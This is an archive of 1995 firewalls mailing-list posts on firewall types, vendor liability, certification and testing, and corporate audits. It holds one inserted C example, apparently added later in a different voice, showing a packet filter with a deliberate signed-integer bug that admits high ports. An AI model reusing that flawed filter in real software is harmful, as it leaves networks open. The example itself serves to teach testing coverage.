>writing an evaluation/report. The three are :
>    1. Proxy Servers
>    2. Packet Filtering
>    3. Fireswalls

Is really

    1) Packet Filter
    2) Proxy Server
    3) Application Filter

and many today are really *all of the above*. A firewall is "a collection
of devices that enforce a security policy", and as such is certainly "all
of the above" plus encryption/decryption, strong authentication,
reconfiguration on exception, and alarming (quite).

>Don't ask me about #3. Suffice it to say 'they' are not exactly
>literate on topics such as these.

So take the chance to educate - don't beat them over the head with it, just
do it right.

>They also want me to do a survey.......

Of what? Nodes? Users? Ferret & Iguana population?

Warmly,
Padgett

From firewalls-owner Fri Sep 8 18:30:05 1995
From: peter@nmti.com (Peter da Silva)
Message-Id: <9509082320.AA14631@sonic.nmti.com.nmti.com>
Subject: Re: On trusting trust
To: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security)
Date: Fri, 8 Sep 1995 18:20:28 -0500 (CDT)
Cc: firewalls@greatcircle.com
In-Reply-To: <9509081938.AA11038@uvs1.orl.mmc.com> from "A. Padgett Peterson, P.E. Information Security" at Sep 8, 95 03:38:22 pm

> Ok, you want the long form ? I would trust the NSA to follow their charter
> as currently directed by the political appointee that runs the place.

But the question was "who would you trust to check out a firewall". Past
experience is that NSA doesn't really care about Security if it's not
National. If your employer isn't the government, or if the firewall isn't
protecting something the NSA thinks needs to be secret, I don't see any
reason for them to care. If your employer is someone the NSA wants to keep
tabs on (like, just about any large firm that works for the government)
then all bets are off.
From firewalls-owner Fri Sep 8 19:30:05 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA13499 for firewalls-outgoing; Fri, 8 Sep 1995 19:23:55 -0700
Received: from panix2.panix.com (panix2.panix.com [198.7.0.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id TAA13486; Fri, 8 Sep 1995 19:23:50 -0700
Received: (from lawnyc@localhost) by panix2.panix.com (8.6.12/8.6.12+PanixU1.1) id WAA19897; Fri, 8 Sep 1995 22:22:24 -0400
Date: Fri, 8 Sep 1995 22:22:21 -0400 (EDT)
From: "John A. Young"
To: Firewalls@GreatCircle.COM
cc: firewalls-digest@GreatCircle.COM
Subject: Re: Firewalls-Digest V4 #518
In-Reply-To: <199509081803.LAA26470@miles.greatcircle.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Fri, 8 Sep 1995 the firewalls-digest included:

> From: Danny Cox
> Date: Fri, 8 Sep 1995 12:45:48 +0100
> Subject: upgrade to commercial firewalls
>
> Management here seems to have a healthy attitude to security - bordering on
> the paranoid if anything, but willing to spend the money, which is good.
>
> Just talking now with one of the senior managers .. our current situation is
> that I've built a firewall router using SOCKS .. my next step may have been
> to upgrade using the TIS fwtk stuff ..
>
> Interesting comment though from him, which in my naivete I'd not thought
> about. If we get attacked and lose software/data etc, then who's liable ?
> If we use freeware products, then no one is. If we use a commercial product,
> then we can, I guess, sue the firewall supplier ... ? At least that was
> his comment, and I'd be very interested to hear what you all think to this
> concept. This is based on the idea that they'd be covered by their indemnity
> insurance ...
>
> ------------------------------
>
> From: Steve Marquess
> Date: Fri, 8 Sep 1995 10:07:32 -0400
> Subject: Re: upgrade to commercial firewalls
>
> This exact same point has been raised repeatedly at my company, a large
> financial services firm with a "healthy bordering on paranoid" concern
> about security. The ability to assign blame in the event of problems is a
> very significant consideration in the acquisition of important systems and
> services. And if you think about it from the management point of view there
> is a certain logic to it: if we suffer a business loss due to the failure
> of "home grown" or "roll your own" (terms of disparagement here...) software
> then the blame must fall on those permitting/approving/performing that
> software development.
>
> If a commercially acquired and configured product failed then it's just
> "well, vendor X let us down again". A fairly common and believable
> situation here. The possibility of actually collecting financial damages
> seems to be less important than the exculpatory assignment of
> responsibility. I don't think anyone really thinks we could pry money out
> of a major vendor because of software defects, especially not for
> incidental damages.
>
> Keep in mind also that any significant decisions about deploying a firewall
> will be made by upper management, all business types far removed from any
> close appreciation of the technical nuances. With all the confusing and
> conflicting advice and information they get from vendors, trade rags, and
> in-house staff they really don't know what to believe. Those of us in the
> boiler room are close to the issues and have definite opinions, but we are
> only a small piece of the real decision process.
>
> The bigger and better known the vendor the more powerful the attraction of
> this argument. Hence a strong predisposition to well known and well marketed
> products, with cost and product quality often very secondary considerations.
>
> ------------------------------
>
> From: Brian Murrell
> Date: Fri, 8 Sep 1995 08:32:15 -0700
> Subject: Re: upgrade to commercial firewalls
>
> > Interesting comment though from him, which in my naivete I'd not thought
> > about. If we get attacked and lose software/data etc, then who's liable ?
>
> Oh goody. I'd love to see this one hashed out, although I think it'll be
> relevant to firewalls for a day or two tops. :-)
>
> > If we use freeware products, then no one is. If we use a commercial product,
> > then we can, I guess, sue the firewall supplier ... ? At least that was
> > his comment, and I'd be very interested to hear what you all think to this
> > concept. This is based on the idea that they'd be covered by their
> > indemnity insurance ...
>
> Good luck.
>
> b.
>
> ------------------------------
>
> From: Ted Doty
> Date: Fri, 8 Sep 1995 10:27:56 -0400
> Subject: Re: upgrade to commercial firewalls
>
> Steve Marquess writes:
>
> > >From: Danny Cox
> >
> > This exact same point has been raised repeatedly at my company, a large
> > financial services firm with a "healthy bordering on paranoid" concern
> > about security. The ability to assign blame in the event of problems is a
> > very significant consideration in the acquisition of important systems
> > and services. And if
> > [snip]
>
> So long as people keep thinking that a magic box will solve all their
> present and future security worries, assigning blame is a somewhat humorous
> exercise in futility. Also, as long as 80% (or whatever the current number
> is ... send your flames to /dev/null) of all "break-ins" are internal, and
> as long as only 5% (same comment as above) of all corporate security
> policies are detailed enough to actually implement something from, you
> probably are barking up the wrong tree.
>
> Most of the security consultants will tell you that a firewall will help,
> but your security is ultimately your own responsibility.
> Get a policy,
> implement it, track it, tell your users what it is, keep your eye on
> bugtraq, (...) and you'll be in pretty good shape. This doesn't mean that
> you won't get hacked, or that you won't lose data (you mean that disaster
> recovery isn't in your policy either?).
>
> Without the above, liability is probably hard to demonstrate.
>
> --
> - Ted

Though this discussion sorely tempts me simply to post "Have gun, will travel", I must agree --as a lawyer-- with Steve, Brian and Ted that the only solace Danny's management can realistically find in the vendor's potential liability is that there will be an identifiable scapegoat to which everyone can point.

Steve reminds me of those ancient days when Compaq was struggling to make it as a fledgling vendor of "clones" and the word generally going around was that "nobody ever got fired for buying IBM".

If, as I've so often read here, "security by obscurity" is foolish, then I would add that "security by obscurity + litigation" is downright insane. Even if one is able to surmount the many obstacles to victory, including those described by Ted, it is virtually impossible to be made "whole". There will be elements of damage which even the most generous judge or jury will not adequately recompense, not to mention the astronomical expenses which we hired guns are wont to run up (over and above our almost invariably modest fees). Also, a major litigation, in and of itself, tends to consume enormous chunks of management's time and energy which otherwise could have been put to much more productive use.

In short, if, *despite* the best laid plans ..., the sky falls in, then litigation might sensibly be considered as a possible element of damage control. But, to base one's plans and choices on the availability of litigation is, IMNSHO, to court disaster.

The place where a good lawyer can best help vis-a-vis a vendor is right at the start, when the purchase contract is being discussed.
Even then, the lawyer's primary value can come from helping you be sure you have properly articulated your needs and that you get what is needed (e.g., access to source code) to satisfy yourself that they are being met -- and not from artfully drafting clauses to pin liability on the vendor if anything goes wrong.

[soapbox mode: off]

Regards,
John

. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
* Providing user-friendly assistance  : LawNYC@panix.com
  to techies and others, from NYC and : John A. Young, J.D. (Yale 1964)
  around the world, in dealing with   : P.O. Box 4695
  the problems, opportunities and     : New York, NY 10185-4695
  plain conundrums encountered when   : Telephone (voice & fax)
  interfacing with the arcane worlds  : (212) 765-2170
  of business, law and property. *    : (718) 875-0337
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

From firewalls-owner Fri Sep 8 20:37:18 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA15177 for firewalls-outgoing; Fri, 8 Sep 1995 20:24:57 -0700
Received: from gatepas.gc.ca (gatepas.gc.ca [192.197.79.133]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id UAA15170 for ; Fri, 8 Sep 1995 20:24:54 -0700
Reply-To: Peter.BEAN@ldn01.x400.gc.ca
Date: Sat, 09 Sep 1995 03:20:01 +0000
Priority: normal
Content-Identifier: OLIVETTI-MAIL3.0
X400-Content-Type: P2-1984
X400-MTS-Identifier: [/PRMD=gc+eaitc.aecec/ADMD=telecom.canada/C=ca/;1032:950909032001]
From: Peter.BEAN@ldn01.x400.gc.ca (BEAN Peter -LDN -AG -LES)
To: Firewalls@GreatCircle.COM
Subject: Firewalls-Digest V4 #519
Message-Id:
<1032*/G=Peter/S=BEAN/O=ldn.01/PRMD=gc+eaitc.aecec/ADMD=telecom.canada/C=ca/@MHS>
Importance: normal
In-Reply-To: <199509090231.TAA13602*/DD.RFC-822=miles.greatcircle.com/PRMD=gc+internet/ADMD=GOVMT.CANADA/C=CA/@MHS>
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I am away from the office until Monday, 18 September 1995

From firewalls-owner Fri Sep 8 21:30:04 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA16157 for firewalls-outgoing; Fri, 8 Sep 1995 21:13:00 -0700
Received: from switchblade.iwi.com (switchblade.iwi.com [137.39.156.214]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id VAA16148 for ; Fri, 8 Sep 1995 21:12:55 -0700
Received: (from mjr@localhost) by switchblade.iwi.com (8.6.9/8.6.9) id AAA15521; Sat, 9 Sep 1995 00:32:57 -0400
From: "Marcus J. Ranum"
Message-Id: <199509090432.AAA15521@switchblade.iwi.com>
Subject: firewall certification authority
To: firewalls@greatcircle.com
Date: Sat, 9 Sep 1995 00:32:57 -0400 (EDT)
Cc: rpower@mfi.com
Reply-To: mjr@iwi.com
Organization: Information Warehouse! Inc, Baltimore, MD
URL: mjr's web page
Phone: 410-889-8569
Coredump: Infocalypse Now!!!
X-Mailer: ELM [version 2.4 PL24]
Content-Type: text
Content-Length: 6060
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>OK folks, imagine there was to be a firewall certification authority. Who
>would you want them to be? Who do you trust?

First ask if there should be one at all. Not all firewalls are the same; many have very different design goals and objectives. For a single authority to certify a firewall will imply a single authority imposing its idea of "correct design": a role NSA has adopted in the past with varying levels of success and questionable benefits to the community.

This is a topic I've been wrestling with for a while. Implicit in the issue of "certification" is the matter of testing, and that's a really tough nut to crack.
Before you can certify a firewall, you need to be able to measure it against some kind of yardstick and determine if it is adequate. Even the concept of adequacy is slippery to come to grips with. A firewall may be adequate from a security perspective but unable to do the job because of some special requirement, cost, or whatever. More importantly, a firewall needs to be correct FOR ITS PROPOSED USE and that needs to be taken into account when it is "certified."

In the past I've given the example of a highly secure high assurance firewall for Email only, which can be easily implemented using a screening router and a UNIX machine. In some people's eyes that might not even be a "firewall" -- a rigid code for certification likely would not cover such an approach as "OK." The DOD computer security rules actually require that a system be considered in its entirety before being certified as acceptable, which was intended to permit someone to make a solid case that a particular approach was sound, without going through all the rigamarole. Unfortunately, it's turned into a bureaucratic trap door through which all manner of braindamaged nonsense can be certified as acceptable.

So how do you test a firewall? I believe there are 2 approaches, which are not necessarily mutually exclusive or incompatible:

1) Programmed "checklist" testing
2) Design-oriented testing

"Checklist" testing would amount to running SATAN++ against the firewall and failing it if SATAN++ found a hole. Do not pass go, do not collect $200. The problem with this approach is that it is very limited: a bug that we don't test for in SATAN++ could slice right through the firewall tomorrow and we'd have to invalidate the whole certification and recertify. The advantage of the "checklist" approach is that it's cheap, quick, easy, and it lets a vendor put a certification "seal of approval" on their product and everyone can get a quick set of warm fuzzies and tell their boss they have exercised due diligence.
Design-oriented testing is when you walk into the room where the engineers who wrote the firewall sit, and start with the question: "Why do you think this firewall protects networks and itself effectively?" and go from there. Depending on the answers they give you, you then formulate a set of tests which propose to verify the properties they claim the firewall has. So, if I tell you my firewall works by testing the psychic *intent* in each packet, a test would be derived whereby we would send malicious packets at the firewall and see if they were blocked. Then we'd send the same packets without thinking nasty thoughts while we did it, and see if they went through. In other words, the test is a custom-tailored approach that matches the design of the system.

The problem with design-oriented testing is that it's hard. It takes skills that are not presently common - I only know 5 people that I would believe could do a good job of this (incidentally, none of them work at NSA) -- it's expensive, slow, and it's hard to explain because to even explain or understand a serious red team review requires a pretty high level of expertise.

I've heard scary stories of people doing "firewall testing" who do not understand UNIX. So, for example, they will tell you the firewall is insecure if the sendmail executable has not been deleted. So their checklist is maybe a little bit off. :) I've heard of other scary stories about people getting an auditor for a firewall and having a CNE appear. It's a networking problem, so who is better qualified than a Certified Network Engineer, right? If someone hired me to do a design-oriented test of a VMS firewall, that'd be pretty ridiculous, too - I'm a UNIX guru, and am completely unqualified to find a hole in a VMS product.

The market is ripe right now for someone to come along and start certifying firewalls. NSA will probably do it for their customer base, which is government only.
As such they will slant their "What is good" requirements to meet their political/technological agenda: NSA approved crypto only, and Fortezza. The question is: If someone starts certifying firewalls, will the certification have any intellectual integrity?

I recently rather derisively dismissed an RFI from a large consulting company that wants to hire "firewall test consultants" and asked for a detailed writeup of the methodology used. (My response was a description of design-oriented testing.) From the layout of the RFI it was pretty clear that they were building a laundry list and were canvassing other consultants to help fill out their own laundry list. Being certified on those terms should not make anyone sleep better at night. Big laundry lists are better than small laundry lists, but if you were to look at the set of facts that SATAN1.0 tested for, there are at least 4 new things since its release that have been discovered. If SATAN1.0 were your firewall test "methodology" you would be toast, right now.

So: back to the original question "who should they be?" and "who do you trust?"

"They" should be the top experts in the field for the particular type of firewall you are talking about. That means that if it's a VMS based firewall, it'd better be a VMS guy, not me, smb, or ches. We don't do VMS. :) If it's a router, then it should be someone who really knows routers. Etc.

"Who do you trust?" - depends on what you've got to lose.

mjr.
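As an added illustration of the coverage gap in "checklist" testing that mjr describes above (and of the port-number "wrapping" case Padgett raises later in this thread), here is a constructed C example, not code from any firewall product or from this list: a filter rule that copies the 16-bit destination port into a signed integer silently admits every port above 32767, and a checklist that only probes the ports its own counter can reach never notices. The rule, the probe value 32793 and the function names are assumptions made for the example.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Constructed example, not code from any firewall or from this thread:
 * an inbound rule that admits only the well-known service ports (0-1023)
 * and blocks the high ports where RPC, X11 and other dynamically bound
 * listeners sit. Both variants return true when the packet is blocked. */
#define PRIVILEGED_PORT_LIMIT 1024

/* Buggy variant: the port is copied into a signed 16-bit integer. Ports
 * above INT16_MAX (32767) do not fit; the conversion is implementation-
 * defined in C and gcc/clang reduce modulo 2^16, so 32793 becomes -32743
 * and the "is this a high port" comparison can never be true for it. */
bool blocked_signed(uint16_t wire_port)
{
    int16_t port = (int16_t)wire_port;
    return port >= PRIVILEGED_PORT_LIMIT;
}

/* Correct variant: keep the port in the unsigned type the wire uses. */
bool blocked_unsigned(uint16_t wire_port)
{
    return wire_port >= PRIVILEGED_PORT_LIMIT;
}

/* A checklist tool that only probes the ports its own counter can reach
 * never sees the difference. Walking the whole 16-bit space shows how many
 * ports the signed filter decides differently from the correct one. */
unsigned int count_misfiltered_ports(void)
{
    unsigned int misfiltered = 0;
    for (uint32_t p = 0; p <= UINT16_MAX; p++) {
        uint16_t port = (uint16_t)p;
        if (blocked_signed(port) != blocked_unsigned(port))
            misfiltered++;
    }
    return misfiltered;   /* 32768: every port from 32768 to 65535 */
}

int main(void)
{
    const uint16_t probe = 32793;   /* the port number from the thread */
    printf("port %u: signed filter blocks=%d, unsigned filter blocks=%d\n",
           (unsigned)probe, (int)blocked_signed(probe),
           (int)blocked_unsigned(probe));
    printf("ports the signed filter wrongly admits: %u of 65536\n",
           count_misfiltered_ports());
    return 0;
}
```

Ports 6000 (X11) and below 32768 are handled identically by both variants, which is exactly why a probe list that stops at 32767 reports a clean pass.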
From firewalls-owner Sat Sep 9 06:02:08 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA21189 for firewalls-outgoing; Sat, 9 Sep 1995 05:33:34 -0700
Received: from research.att.com (research.att.com [192.20.225.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id FAA21182 for ; Sat, 9 Sep 1995 05:33:31 -0700
From: smb@research.att.com
Message-Id: <199509091233.FAA21182@miles.greatcircle.com>
Received: by gryphon; Sat Sep 9 08:31:09 EDT 1995
To: Firewalls@GreatCircle.COM
cc: dmurphy@coltrane.cwa.com
Subject: Re: Corporate Audits
Date: Sat, 09 Sep 95 08:31:08 EDT
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

	 So, have any of you big-business wage-slaves had corporate
	 auditors come into your shop and ask questions (perceptive or
	 otherwise) about firewalls and network security yet, and if
	 so, would you be willing/able to share such stories with the
	 list?

I'm not sure if I should name names or not -- it's not my place to do so -- but I know for certain that at least one large industrial outfit was barred by their auditors from connecting to the Internet until they had a heavy-duty firewall in place.

From firewalls-owner Sat Sep 9 06:02:35 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA21290 for firewalls-outgoing; Sat, 9 Sep 1995 05:51:50 -0700
Received: from uvs1.orl.mmc.com (uvs1.orl.mmc.com [141.240.192.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id FAA21283 for ; Sat, 9 Sep 1995 05:51:45 -0700
Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA13022; Sat, 9 Sep 95 07:38:42 -0400
Date: Sat, 9 Sep 95 07:38:41 -0400
Message-Id: <9509091138.AA13022@uvs1.orl.mmc.com>
From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security)
To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com
Subject: Who you gonna trust ?
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

mjr rites: "bits and pieces" (what is an ASCII music symbol ?)

>For a single authority to certify a
>firewall will imply a single authority imposing its idea of
>"correct design": a role NSA has adopted in the past with varying
>levels of success and questionable benefits to the community.

I must respectfully say that this is a simplistic view of a "certifying authority" and hold up the Society of Automotive Engineers (SAE) as another way. The multi-volume "SAE Handbook" covers a broad number of standards relating to automobiles. If you want to know what "5W-30" means, look at SAE J183.

Similarly, each class of service (e.g. SMTP) would have a separate set of standards (the RFC is a place to start) and tests to certify that it does this and only this. One logical subtest would be an "overflow test". But this is not where the testing would start; rather it would begin just as the 7 layer model does, with the physical layer, defining the acceptable level and type of electrical/optical signals accepted and possibly suggesting action to occur if not reached or exceeded.

> More importantly, a firewall needs to be correct FOR ITS
>PROPOSED USE and that needs to be taken into account when it is
>"certified."

Exactly right, but to do so you must start at the bottom (well, until certain structures are certified to meet the requirements up to a point; then those systems using that structure may build on it in ways supported by that structure, and need only test the additions).

> I believe there are 2 approaches, which are not necessarily
>mutually exclusive or incompatible:
> 1) Programmed "checklist" testing
> 2) Design-oriented testing
> "Checklist" testing would amount to running SATAN++ against
>the firewall and failing it if SATAN++ found a hole. Do not pass go,
>do not collect $200.

Here I disagree. S*T*N is a "quick and dirty" test.
That it succeeds or does not succeed depends on a specific set of circumstances that are available from the node level. It does *nothing* to test the physical layer as I mentioned above, yet to *certify*, it must.

I suspect that the problem here (and on this list in general) is "when all you have is a hammer, everything starts to look like a nail". Certain elements, being inherently unreachable from a workstation or notebook, are dismissed. Just as an example of one I have not seen addressed: what does a firewall/system combination do when given port address 32,793 ? It is a legitimate port number, yet I have heard tales of wrapping... S*T*N does not test it. Even the FWTK port strober does not reach that high. Some would say it is silly to go that far and it would be impractical unless sitting next to the device to test all 65k, yet *they are there*.

> The problem with this approach is that it is
>very limited: a bug that we don't test for in SATAN++ could slice
>right through the firewall tomorrow and we'd have to invalidate the
>whole certification and recertify. The advantage of the "checklist"
>approach is that it's cheap, quick, easy, and it lets a vendor put a
>certification "seal of approval" on their product and everyone can
>get a quick set of warm fuzzies and tell their boss they have
>exercised due diligence.

Exactly what I was getting at. Of course if the only reason for "certification" is to CYA then the above doesn't matter - just find a group in or around Washington with an impressive set of initials to sell you one. (BTW where can I buy a law degree ?)

> Design-oriented testing is when you walk into the room where
>the engineers who wrote the firewall sit, and start with the question:
>"Why do you think this firewall protects networks and itself effectively?"
>and go from there.

This also leaves out too much. Where did they start their assumptions ? For what environment ? What is a Network (TCP/IP, IPX, Vines) ?
> I've heard scary stories of people doing "firewall testing"
>who do not understand UNIX. So, for example, they will tell you the
>firewall is insecure if the sendmail executable has not been deleted.

"When you are a hammer..." - Sorry, but the world does not revolve around UNIX. Some firewalls build on that as a base; more have a front end that *looks* sort of like UNIX because a lot of people are familiar with/expect that syntax so get a "warm and fuzzy". Real engineers do not go by feelings (hunches & intuition now...). Of course real engineers spend a lot of time being bored while watching tests.

>If someone hired me to do a design-oriented test of a VMS firewall, that'd
>be pretty ridiculous, too - I'm a UNIX guru, and am completely unqualified to
>find a hole in a VMS product.

Am (or used to be 8*) qualified - have written enough VMS device drivers to say there is No Way I'd accept a VMS firewall. Ultrix or VaxElin (does it still exist ?) maybe, but not VMS, for the same reason I have my doubts about NT. Ring/privilege based systems are good so long as nothing crosses the rings. Once you start... This is the reason I prefer a collection of dumb, single-state machines.

> The market is ripe right now for someone to come along and
>start certifying firewalls.

Yes, I saw the NCSA announcement.

> NSA will probably do it for their customer
>base, which is government only. As such they will slant their "What
>is good" requirements to meet their political/technological agenda:

Nothing wrong with that so long as you can be reasonably sure what their agenda is, and that will be evident by an examination of their testing methodology, which is another issue - I would not trust *any* certificating authority which did not make its methodology available for examination.

> I recently rather derisively dismissed an RFI from a large
>consulting company that wants to hire "firewall test consultants"
>and asked for a detailed writeup of the methodology used.
>(My response
>was a description of design-oriented testing) From the layout of
>the RFI it was pretty clear that they were building a laundry list
>and were canvassing other consultants to help fill out their own
>laundry list.

LLPs (Limited Liability Partnerships) supplemented by a cast of captive consultants seem to be very attractive to the biggies nowadays; not so sure what is in it for a Really Good Consultant since nothing is guaranteed other than "we will steer business we don't want your way", and it is evident that it will be Sayonara as soon as they build their stable of just-out-of-school (e.g. cheap) network guys on the reps of the LLPs (have been approached by some myself).

> "Who do you trust?" - depends on what you've got to lose.

True. Reminds me of the story a little while ago about a manager who was getting bonuses for spending almost nothing on security while stroking upper management. When asked what he would do if an incident occurred, said: "This year I'll just find another job, next year I'll have enough to retire..."

Point I am trying to make is that a "security professional" must be concerned primarily with exception avoidance. Unfortunately, if you are successful, nothing happens, so why are you needed ?

Run into this problem myself - we have these things called "metrics", essentially "what did you do this week". Minor flap was the winword.concept/prank macro/wordmacro virus. Found out about it several weeks ago & put together an easy/effective defense (combination of "Prompt to save Normal" & "DisableAutoMacros"). When the fuss started I sent out a note. So what are the metrics ? An hour for the note ? Could not list the hours spent the week before because then there was no problem (and might not be) - Research ? We have no budget for that. Of course I guess the fact that I still have a job indicates something...
Meanwhile back on track: so what we need is an independent certifying authority like Underwriters or the SAE to create standards (no activity on the firewalls-standards list lately). Problem is that those who could set something like that up are not the people needed to do the work - why magazines/movies separate it: the publishers/producers bring the money in and the editors/directors decide how it goes out. Both are full time jobs requiring entirely different skills. Our trouble is that we have a lot of good directors and actors but the producers are mainly snake oil salesmen. Those who might be able to transition are tied down by job/family. I figure it would take a seed of U$10 million to get started and U$3 million a year for three years to produce anything meaningful - any takers ?

Warmly, Padgett

From firewalls-owner Sat Sep 9 12:30:05 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA24862 for firewalls-outgoing; Sat, 9 Sep 1995 12:03:19 -0700
Received: from mtldns.mtl.unisysgsg.com (mtldns.mtl.paramax.com [128.126.52.200]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA24855 for ; Sat, 9 Sep 1995 12:03:15 -0700
Received: from monsmtp.mtl.unisysgsg.com (monsmtp.mtl.paramax.com) by mtldns.mtl.unisysgsg.com (4.1/SMI-4.1) id AA10937; Sat, 9 Sep 95 14:38:07 EDT
Received: by monsmtp.mtl.unisysgsg.com with Microsoft Mail id <3051E51E@monsmtp.mtl.unisysgsg.com>; Sat, 09 Sep 95 15:03:58 EDT
From: "Belisle, Michel @ MON"
To: firewalls
Subject: Firewalls product
Date: Sat, 09 Sep 95 15:00:00 EDT
Message-Id: <3051E51E@monsmtp.mtl.unisysgsg.com>
Encoding: 8 TEXT
X-Mailer: Microsoft Mail V3.0
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I'm looking for a firewall comparison chart, a document that will compare most popular products, and identify what each can and can't do ?
Michel Belisle, Information Technology, mbelisl@mtl.unisysgsg.com

From firewalls-owner Sat Sep 9 12:32:36 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA25242 for firewalls-outgoing; Sat, 9 Sep 1995 12:19:00 -0700
Received: from [198.102.244.42] (pb520.greatcircle.com [198.102.244.42]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA25230; Sat, 9 Sep 1995 12:18:53 -0700
X-Sender: brent@miles.greatcircle.com
Message-Id:
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Sat, 9 Sep 1995 12:18:15 -0800
To: smb@research.att.com, Firewalls@GreatCircle.COM
From: Brent@GreatCircle.COM (Brent Chapman)
Subject: Re: Corporate Audits
Cc: dmurphy@coltrane.cwa.com
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

At 8:31 AM 9/9/95, smb@research.att.com wrote:
>	 So, have any of you big-business wage-slaves had corporate
>	 auditors come into your shop and ask questions (perceptive or
>	 otherwise) about firewalls and network security yet, and if
>	 so, would you be willing/able to share such stories with the
>	 list?
>
>I'm not sure if I should name names or not -- it's not my place to do
>so -- but I know for certain that at least one large industrial outfit
>was barred by their auditors from connecting to the Internet until they
>had a heavy-duty firewall in place.

Which, if they're not VERY careful, merely means that the organization is going to have a dozen or more "underground" connections spring up at various sites and within various groups, each of which individually is probably fairly insecure. It's just too easy for somebody to go get a modem and phone line (or, heck, even an ISDN or frame relay line), and service from some local or national service provider. They'll be in place and in use and invaluable to the groups using them, and (alas) probably not properly secured.

How to deal with this varies by organization.
However, blanket "Thou shalt not connect to the Internet" directives are very difficult to enforce, and seldom have the desired effect. You've got to provide useful alternatives (like a useful connection through a properly secured central firewall). The key is, the USERS determine the definition of "useful"; if they determine that what you're offering doesn't meet their needs, they'll go around you.

-Brent

--
Brent Chapman          | Great Circle Associates | For Firewalls Tutorial info:
Brent@GreatCircle.COM  | 1057 West Dana Street   | Tutorial-Info@GreatCircle.COM
+1 415 962 0841        | Mountain View, CA 94041 | http://www.greatcircle.com

From firewalls-owner Sat Sep 9 22:30:36 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA00517 for firewalls-outgoing; Sat, 9 Sep 1995 22:22:53 -0700
Received: from switchblade.iwi.com (switchblade.iwi.com [137.39.156.214]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id WAA00510 for ; Sat, 9 Sep 1995 22:22:49 -0700
Received: (from mjr@localhost) by switchblade.iwi.com (8.6.9/8.6.9) id BAA18485 for firewalls@greatcircle.com; Sun, 10 Sep 1995 01:43:23 -0400
From: "Marcus J. Ranum"
Message-Id: <199509100543.BAA18485@switchblade.iwi.com>
Subject: rant on testing expands into white paper -
To: firewalls@greatcircle.com
Date: Sun, 10 Sep 1995 01:43:22 -0400 (EDT)
Reply-To: mjr@iwi.com
Organization: Information Warehouse! Inc, Baltimore, MD
URL: mjr's web page
Phone: 410-889-8569
Coredump: Infocalypse Now!!!
X-Mailer: ELM [version 2.4 PL24]
Content-Type: text
Content-Length: 713
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

The recent rant I posted here on testing firewalls, and "certifying" them, addresses a topic I feel is very important for us all to think about. It's the whole problem of how to test something that is incredibly configurable, field-installable, customer-upgradeable, complex, and vitally important.
Anyhow - I have a lot of opinions on the topic and I thought I'd get them off my chest by extending my previous mail into a short white paper. It's on:

http://www.iwi.com/iw-pubs.html

I hope it can serve as a trigger for further discussions. In fact, if anyone has any rebuttals or other testing-related white papers they'd like hyperlinked or posted on the 'web, I'd be happy to host them on my server.

mjr.

From firewalls-owner Sun Sep 10 01:00:04 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA01728 for firewalls-outgoing; Sun, 10 Sep 1995 00:42:56 -0700
Received: from aristo.tau.ac.il (aristo.tau.ac.il [132.66.32.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id AAA01721 for ; Sun, 10 Sep 1995 00:42:50 -0700
Received: from radguard.co.il ([192.114.26.210]) by aristo.tau.ac.il with SMTP id AA01414 (5.67b/IDA-1.5 for ); Sun, 10 Sep 1995 10:41:12 +0300
Received: by radguard.co.il (4.1/SMI-4.1) id AA10129; Sun, 10 Sep 95 09:40:35 IDT
Received: from elgamal.radguard.co.il(192.114.210.2) by gatekeeper.radguard.co.il via smap (V1.3) id sma010127; Sun Sep 10 09:40:14 1995
Received: by elgamal.radguard.co.il (4.1/SMI-4.1) id AA20958; Sun, 10 Sep 95 09:40:11 IDT
Date: Sun, 10 Sep 95 09:40:11 IDT
From: ronys@elgamal.radguard.co.il (Rony Shapiro)
Message-Id: <9509100640.AA20958@elgamal.radguard.co.il>
To: firewalls@greatcircle.com
Subject: Re: Firewall-1 concerns
Reply-To: ronys@radguard.co.il
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi,

Recently, "Someone very concerned" posted (anonymously) to this mailing list regarding the Firewall-1 product. The poster was concerned that since the source code is not available to the reseller of the product, a trap door may have been installed.

